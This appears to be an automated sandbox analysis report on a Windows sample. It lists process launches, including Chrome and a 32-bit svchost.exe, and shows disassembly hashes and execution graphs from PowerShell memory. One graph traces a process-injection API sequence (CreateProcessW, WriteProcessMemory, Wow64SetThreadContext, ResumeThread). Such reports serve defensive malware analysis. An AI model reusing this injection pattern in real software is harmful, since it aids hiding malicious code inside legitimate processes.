                                                                                Target ID:65
                                                                                Start time:05:35:07
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1968,i,9602569947055018222,14101658706447688223,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:66
                                                                                Start time:05:35:11
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:67
                                                                                Start time:05:35:12
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1500 --field-trial-handle=1492,i,7162340336741099282,8203552688004924699,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:68
                                                                                Start time:05:35:12
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:69
                                                                                Start time:05:35:12
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:70
                                                                                Start time:05:35:15
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:71
                                                                                Start time:05:35:16
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2012,i,3848042767598446159,15832118433102009625,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:72
                                                                                Start time:05:35:22
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:73
                                                                                Start time:05:35:22
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2028,i,15924250175209133703,8349155567450697044,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:74
                                                                                Start time:05:35:22
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:75
                                                                                Start time:05:35:22
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:76
                                                                                Start time:05:35:26
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:77
                                                                                Start time:05:35:26
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1728 --field-trial-handle=1980,i,7225582587041739135,14714490613506234970,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:78
                                                                                Start time:05:35:29
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:79
                                                                                Start time:05:35:30
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2012,i,8574600569835257597,12503451850514221727,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:80
                                                                                Start time:05:35:30
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:81
                                                                                Start time:05:35:30
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:82
                                                                                Start time:05:35:33
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:83
                                                                                Start time:05:35:33
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1648 --field-trial-handle=1996,i,18342384901192943427,3001916881733487027,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:84
                                                                                Start time:05:35:38
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:85
                                                                                Start time:05:35:39
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2008,i,13349874762832594225,9819071068630656309,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:86
                                                                                Start time:05:35:40
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:87
                                                                                Start time:05:35:40
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:88
                                                                                Start time:05:35:42
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:89
                                                                                Start time:05:35:43
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1984,i,11069439797262297707,896590743492590315,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Executed Functions

                                                                                  Function 00007FF848DA24ED Relevance: .5, Instructions: 456COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2176823428.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7ff848da0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4dd2d48f0c05759600e1fca0e1a05dbed880511f6dc9a87311e0e685473f4697
                                                                                  • Instruction ID: 449b24f130bebe2a16123c762877e58362cf802d621ba487d312db1274c01865
                                                                                  • Opcode Fuzzy Hash: 4dd2d48f0c05759600e1fca0e1a05dbed880511f6dc9a87311e0e685473f4697
                                                                                  • Instruction Fuzzy Hash: 07E13331E0FB8A5FEB96AB2998156B97BA1EF16390F1800FAD04DC71D3DB189C09C355
                                                                                  Function 00007FF848DA2536 Relevance: .3, Instructions: 288COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2176823428.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7ff848da0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 703cd24aaa24e1f746f479ed6b48af10b6fec1ed65e4fa218e1862fd171b4c5d
                                                                                  • Instruction ID: b3622831e2be8c5d86b256f6c524cd468d1c7e6396ee2d969cab484182cf735a
                                                                                  • Opcode Fuzzy Hash: 703cd24aaa24e1f746f479ed6b48af10b6fec1ed65e4fa218e1862fd171b4c5d
                                                                                  • Instruction Fuzzy Hash: E491E121E0FBC64FEB96AB2848646757FE1EF16690F2900FAC049CB1D3DA1C9C49C356
                                                                                  Function 00007FF848CD4CE5 Relevance: .0, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2176674649.00007FF848CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7ff848cd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                  • Instruction ID: 37fc9caa34a5c56b615ad4bcd41c99b15845001a258ecc5933f33d14631ad2dd
                                                                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                  • Instruction Fuzzy Hash: 7D01677111CB0C4FD744EF4CE451AA5B7E0FB95364F10056DE58AC3651D736E882CB45

                                                                                  Executed Functions

                                                                                  Function 00007FF848CE37B5 Relevance: .0, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2505727168.00007FF848CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CE0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ff848ce0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                  • Instruction ID: 55542712fca55ba54de952b9380edddcb8beb0294b5c14c79122f40227c60d2c
                                                                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                  • Instruction Fuzzy Hash: 1301447111CB094FD744EF0CE451AA6B7E0FB99364F10056DE58AC3651D726E882CB45

                                                                                  Execution Graph

                                                                                  Execution Coverage:4%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:33
                                                                                  Total number of Limit Nodes:2
                                                                                  execution_graph 4999 7ff848cdbdd5 5000 7ff848cdbde3 Wow64SetThreadContext 4999->5000 5002 7ff848cdbeb3 5000->5002 5003 7ff848cdc205 5004 7ff848cdc213 ResumeThread 5003->5004 5006 7ff848cdc2ab 5004->5006 5007 7ff848cdc0e4 5008 7ff848cdc0ed WriteProcessMemory 5007->5008 5010 7ff848cdc1d1 5008->5010 5034 7ff848cdb8a6 5037 7ff848cdba36 5034->5037 5036 7ff848cdb8b6 5038 7ff848cdba3e CreateProcessW 5037->5038 5041 7ff848cdbcd3 5038->5041 5040 7ff848cdbd2e 5040->5036 5041->5040 5042 7ff848cdbd66 Wow64SetThreadContext 5041->5042 5042->5040 5011 7ff848cdbad8 5012 7ff848cdbadf CreateProcessW 5011->5012 5015 7ff848cdbcd3 5012->5015 5014 7ff848cdbd2e 5015->5014 5017 7ff848cdbd66 5015->5017 5018 7ff848cdbda1 5017->5018 5019 7ff848cdbd8c 5017->5019 5018->5014 5019->5018 5020 7ff848cdbe7f Wow64SetThreadContext 5019->5020 5021 7ff848cdbeb3 5020->5021 5021->5014 5022 7ff848cdb76b 5025 7ff848cdb8f2 5022->5025 5028 7ff848cdba7f 5025->5028 5027 7ff848cdb8ce 5029 7ff848cdbaa7 CreateProcessW 5028->5029 5032 7ff848cdbcd3 5029->5032 5031 7ff848cdbd2e 5031->5027 5032->5031 5033 7ff848cdbd66 Wow64SetThreadContext 5032->5033 5033->5031

                                                                                  Executed Functions

                                                                                  Function 00007FF848DA00DD Relevance: 1.8, Strings: 1, Instructions: 593COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 7ff848da00dd-7ff848da0167 4 7ff848da016d-7ff848da0177 0->4 5 7ff848da02bf-7ff848da02fc 0->5 6 7ff848da0193-7ff848da01a0 4->6 7 7ff848da0179-7ff848da0191 4->7 16 7ff848da0375-7ff848da0385 5->16 17 7ff848da02fe-7ff848da0311 5->17 14 7ff848da0260-7ff848da026a 6->14 15 7ff848da01a6-7ff848da01a9 6->15 7->6 18 7ff848da0279-7ff848da02b3 14->18 19 7ff848da026c-7ff848da0278 14->19 15->14 20 7ff848da01af-7ff848da01b7 15->20 24 7ff848da0387 16->24 25 7ff848da0388-7ff848da0417 16->25 28 7ff848da02b5 17->28 18->28 20->5 21 7ff848da01bd-7ff848da01c7 20->21 26 7ff848da01e0-7ff848da01e4 21->26 27 7ff848da01c9-7ff848da01de 21->27 24->25 40 7ff848da041d-7ff848da0427 25->40 41 7ff848da056f-7ff848da05c1 25->41 26->14 31 7ff848da01e6-7ff848da01e9 26->31 27->26 33 7ff848da0312-7ff848da0371 28->33 34 7ff848da02b6-7ff848da02bc 28->34 36 7ff848da0200-7ff848da0204 31->36 37 7ff848da01eb-7ff848da01f4 31->37 84 7ff848da0373 33->84 85 7ff848da0374 33->85 34->5 36->14 48 7ff848da0206-7ff848da020c 36->48 37->36 46 7ff848da0443-7ff848da0450 40->46 47 7ff848da0429-7ff848da0441 40->47 70 7ff848da0565-7ff848da056c 41->70 59 7ff848da0510-7ff848da051a 46->59 60 7ff848da0456-7ff848da0459 46->60 47->46 50 7ff848da022b-7ff848da0239 48->50 51 7ff848da020e-7ff848da0229 48->51 67 7ff848da0252-7ff848da025f 50->67 68 7ff848da023b-7ff848da0248 50->68 51->50 63 7ff848da0529-7ff848da0563 59->63 64 7ff848da051c-7ff848da0528 59->64 60->59 66 7ff848da045f-7ff848da0467 60->66 63->70 66->41 73 7ff848da046d-7ff848da0477 66->73 68->67 78 7ff848da024a-7ff848da0250 68->78 70->41 76 7ff848da0490-7ff848da0494 73->76 77 7ff848da0479-7ff848da048e 73->77 76->59 82 7ff848da0496-7ff848da0499 76->82 77->76 78->67 86 7ff848da04c0 82->86 87 7ff848da049b-7ff848da04be 82->87 84->85 85->16 89 7ff848da04c2-7ff848da04c4 86->89 87->89 89->59 91 7ff848da04c6-7ff848da04d0 89->91 93 7ff848da04d2-7ff848da04d9 91->93 94 7ff848da04e0-7ff848da04e9 93->94 95 7ff848da0502-7ff848da050f 94->95 96 7ff848da04eb-7ff848da04f8 94->96 96->95 98 7ff848da04fa-7ff848da0500 96->98 98->95
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2448093117.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848da0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: H
                                                                                  • API String ID: 0-2852464175
                                                                                  • Opcode ID: 6afaf372770f170746bf0d2adc91d3fc90ef7d13287a76e21c3bc03f099f56a0
                                                                                  • Instruction ID: 3eaafe38b4d2fe77e87ec62145be2707475907b5627a01d0b754715efc918146
                                                                                  • Opcode Fuzzy Hash: 6afaf372770f170746bf0d2adc91d3fc90ef7d13287a76e21c3bc03f099f56a0
                                                                                  • Instruction Fuzzy Hash: 8302F231E0EB898FEB96BB2858587B57BE1EF56290F1801FBC04DC7193EA199C09C355
                                                                                  Function 00007FF848CDBA36 Relevance: 1.8, APIs: 1, Instructions: 335COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2444659298.00007FF848CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848cd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6cedc3d84b0e2c19e1b74b16aaede09eca54d3eaaeb3953013e8d721da6d88a2
                                                                                  • Instruction ID: a4c044abd66741c181cccac51615d0e43a837cbfb0436250d1680dd5336a1f9e
                                                                                  • Opcode Fuzzy Hash: 6cedc3d84b0e2c19e1b74b16aaede09eca54d3eaaeb3953013e8d721da6d88a2
                                                                                  • Instruction Fuzzy Hash: 91C1823190DB988FDB66DF2888556E9BBF0EF5A310F0442DBD049D7252DB34A985CB81
                                                                                  Function 00007FF848DA6C55 Relevance: 1.8, Strings: 1, Instructions: 569COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
